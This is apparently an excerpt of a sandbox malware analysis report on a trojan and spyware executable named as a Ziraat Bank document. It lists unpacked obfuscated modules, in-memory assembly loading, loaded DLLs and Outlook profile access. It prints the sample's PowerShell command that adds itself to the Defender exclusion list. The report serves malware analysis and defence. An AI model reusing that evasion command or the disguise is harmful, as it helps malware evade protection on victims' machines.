          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38d43e8.4.raw.unpack, -.csBase64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.38f4608.3.raw.unpack, -.csBase64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, fABkfU3Z8awbXM3bZr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, fABkfU3Z8awbXM3bZr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@4/3
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.logJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMutant created: NULL
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMutant created: \Sessions\1\BaseNamedObjects\VhLqpfcHqWZ
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_namqra0d.f00.ps1Jump to behavior
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeReversingLabs: Detection: 32%
          Source: unknownProcess created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: RRye.pdb source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
          Source: Binary string: RRye.pdbSHA256 source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.53d0000.5.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, xeQC5ayUf3TpgtdV4u.cs.Net Code: Flwu4yWCJq System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.7220000.6.raw.unpack, xeQC5ayUf3TpgtdV4u.cs.Net Code: Flwu4yWCJq System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28edd60.1.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.28e4748.0.raw.unpack, JK.cs.Net Code: ve System.Reflection.Assembly.Load(byte[])
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: 0xC125EA6D [Wed Sep 7 15:25:33 2072 UTC]
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F39695 push es; iretd 3_2_06F39698
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F344E8 push eax; iretd 3_2_06F344E9
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F38BCD push es; retf 3_2_06F38BD0
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3C899 push es; retf 3_2_06F3C8A0
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeStatic PE information: section name: .text entropy: 7.823687810026105
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.53d0000.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, fABkfU3Z8awbXM3bZr.csHigh entropy of concatenated method names: 'XbyQf6YqD1', 'HOIQrGTJCy', 'tStQwc9pxB', 'VGjQK9oK6g', 'QF6QPc9Aqm', 'PREQVJvZkX', 'ztGQEF1D3a', 'nlVQMc27hA', 'BRmQ5ytT2u', 'eTsQFhblXX'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, aOwyEqwyrju2kXFDoT.csHigh entropy of concatenated method names: 'ToString', 'RpEkLK9qWF', 'IjNk0oMMI8', 'Vk4kJfTe5g', 'qPLkWvHuNe', 'IockoeZTwU', 'o7AkXNvs69', 'xXmkCaH8Tx', 'pXJkvceUps', 'z5bk7dpQba'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, qDFOWtG9VuR5pdyc2O.csHigh entropy of concatenated method names: 'h9om3XPIBf', 'XlHmpe2i8U', 'SCGmHMs6On', 'T0Ym0UsEtC', 'LpGmW2QLqy', 'bSsmo268mH', 'LURmC7kBjg', 'LjHmv0qQuV', 'MKfmdLMmTe', 'DgEmLJtyS7'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, oZUwic70lEwBnIGtjJ.csHigh entropy of concatenated method names: 'OlOhiopZq2', 'YmdhIKa9HC', 'e5fh4xfBA7', 'wrJhZ0ImwD', 'iXgheRr01y', 'RL6hxaGjmw', 'mQuhBeVAGy', 'kvAh3Yvj79', 'cwmhp2uarV', 'ul6hbbxhBq'
          Source: 0.2.ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe.3a656d0.2.raw.unpack, MREV3Spms4ghM97Z3I.csHigh entropy of concatenated method names: 'ClvgZwrpfI', 'xdZgxtfJfF', 'Mv3g31pK3Y', 'mMfgp0JTkx', 'GdqglUrcaP', 'mqxgk6yCwF', 'wohgNfWmy6', 'VQfgc4PWXv', 'MHSgDGPK5G', 'iVvg6AsENk'
